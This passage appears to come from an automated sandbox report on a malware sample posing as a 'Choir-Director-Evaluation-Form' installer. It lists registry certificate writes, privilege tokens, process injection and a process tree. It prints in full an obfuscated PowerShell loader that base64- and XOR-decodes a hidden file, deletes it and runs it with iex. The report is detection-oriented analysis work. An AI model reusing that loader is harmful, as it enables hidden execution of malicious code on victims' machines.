Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	PDFescape_Desktop_Installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

PDFescape_Desktop_Installer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2824	PDFescape_Desktop_Installer.exe
2824	PDFescape_Desktop_Installer.exe
3152	powershell.exe
3152	powershell.exe
4144	powershell.exe
4144	powershell.exe
4100	powershell.exe
4100	powershell.exe
4188	powershell.exe
4188	powershell.exe
2184	powershell.exe
2184	powershell.exe
3872	powershell.exe
3872	powershell.exe
4264	powershell.exe
4264	powershell.exe
4332	powershell.exe
4332	powershell.exe
4400	powershell.exe
4400	powershell.exe
4480	powershell.exe
4480	powershell.exe
3152	powershell.exe
4100	powershell.exe
2184	powershell.exe
3872	powershell.exe
4144	powershell.exe
4188	powershell.exe
4264	powershell.exe
4332	powershell.exe
4400	powershell.exe
4480	powershell.exe
4100	powershell.exe
2184	powershell.exe
3872	powershell.exe
3152	powershell.exe
4144	powershell.exe
4188	powershell.exe
4332	powershell.exe
4264	powershell.exe
4400	powershell.exe
4480	powershell.exe
2824	PDFescape_Desktop_Installer.exe
2824	PDFescape_Desktop_Installer.exe
2184	powershell.exe
2184	powershell.exe
4100	powershell.exe
4100	powershell.exe
2184	powershell.exe
3152	powershell.exe
3152	powershell.exe
4100	powershell.exe
2184	powershell.exe
3152	powershell.exe
2184	powershell.exe
2184	powershell.exe
3872	powershell.exe
3872	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
3152	powershell.exe
3152	powershell.exe
3872	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePDFescape_Desktop_Installer.exemsiexec.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeShutdownPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeIncreaseQuotaPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSecurityPrivilege	3224	msiexec.exe
Token: SeCreateTokenPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeAssignPrimaryTokenPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeLockMemoryPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeIncreaseQuotaPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeMachineAccountPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeTcbPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSecurityPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeTakeOwnershipPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeLoadDriverPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSystemProfilePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSystemtimePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeProfSingleProcessPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeIncBasePriorityPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeCreatePagefilePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeCreatePermanentPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeBackupPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeRestorePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeShutdownPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeDebugPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeAuditPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSystemEnvironmentPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeChangeNotifyPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeRemoteShutdownPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeUndockPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeSyncAgentPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeEnableDelegationPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeManageVolumePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeImpersonatePrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeCreateGlobalPrivilege	2824	PDFescape_Desktop_Installer.exe
Token: SeBackupPrivilege	2812	vssvc.exe
Token: SeRestorePrivilege	2812	vssvc.exe
Token: SeAuditPrivilege	2812	vssvc.exe
Token: SeBackupPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe
Token: SeTakeOwnershipPrivilege	3224	msiexec.exe
Token: SeRestorePrivilege	3224	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

PDFescape_Desktop_Installer.exe

pid process

2824 PDFescape_Desktop_Installer.exe
2824 PDFescape_Desktop_Installer.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

PDFescape_Desktop_Installer.exe

pid process

2824 PDFescape_Desktop_Installer.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MicrosoftEdge.exe

pid process

13120 MicrosoftEdge.exe

pid	process
13120	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Choir-Director-Evaluation-Form.exeChoir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exemsiexec.exe

description	pid	process	target process
PID 1892 wrote to memory of 1520	1892	Choir-Director-Evaluation-Form.exe	Choir-Director-Evaluation-Form.tmp
PID 1892 wrote to memory of 1520	1892	Choir-Director-Evaluation-Form.exe	Choir-Director-Evaluation-Form.tmp
PID 1892 wrote to memory of 1520	1892	Choir-Director-Evaluation-Form.exe	Choir-Director-Evaluation-Form.tmp
PID 1520 wrote to memory of 2824	1520	Choir-Director-Evaluation-Form.tmp	PDFescape_Desktop_Installer.exe
PID 1520 wrote to memory of 2824	1520	Choir-Director-Evaluation-Form.tmp	PDFescape_Desktop_Installer.exe
PID 1520 wrote to memory of 2824	1520	Choir-Director-Evaluation-Form.tmp	PDFescape_Desktop_Installer.exe
PID 2824 wrote to memory of 784	2824	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 2824 wrote to memory of 784	2824	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 2824 wrote to memory of 784	2824	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 2824 wrote to memory of 3176	2824	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 2824 wrote to memory of 3176	2824	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 2824 wrote to memory of 3176	2824	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 1520 wrote to memory of 3872	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 3872	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 3872	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 2184	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 2184	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 2184	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 3152	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 3152	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 3152	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4100	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4100	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4100	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4144	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4144	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4144	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4188	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4188	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4188	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4264	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4264	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4264	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4332	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4332	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4332	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4400	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4400	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4400	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4480	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4480	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 1520 wrote to memory of 4480	1520	Choir-Director-Evaluation-Form.tmp	powershell.exe
PID 3224 wrote to memory of 7056	3224	msiexec.exe	srtasks.exe
PID 3224 wrote to memory of 7056	3224	msiexec.exe	srtasks.exe
PID 3224 wrote to memory of 12172	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 12172	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 4396	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 4396	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 780	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 780	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 5144	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 5144	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 5144	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 5484	3224	msiexec.exe	ws.exe
PID 3224 wrote to memory of 5484	3224	msiexec.exe	ws.exe
PID 3224 wrote to memory of 6088	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 6088	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 6364	3224	msiexec.exe	updater-ws.exe
PID 3224 wrote to memory of 6364	3224	msiexec.exe	updater-ws.exe
PID 3224 wrote to memory of 11144	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 11144	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 6032	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 6032	3224	msiexec.exe	MsiExec.exe
PID 3224 wrote to memory of 5136	3224	msiexec.exe	MsiExec.exe

C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe
"C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1892

C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HMJ2A.tmp\Choir-Director-Evaluation-Form.tmp" /SL5="$30030,111934780,999424,C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1520

C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\is-A241P.tmp\PDFescape_Desktop_Installer.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2824

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
4⤵
- Loads dropped DLL
- Modifies registry class
PID:784

C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
4⤵
- Executes dropped EXE
PID:3176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
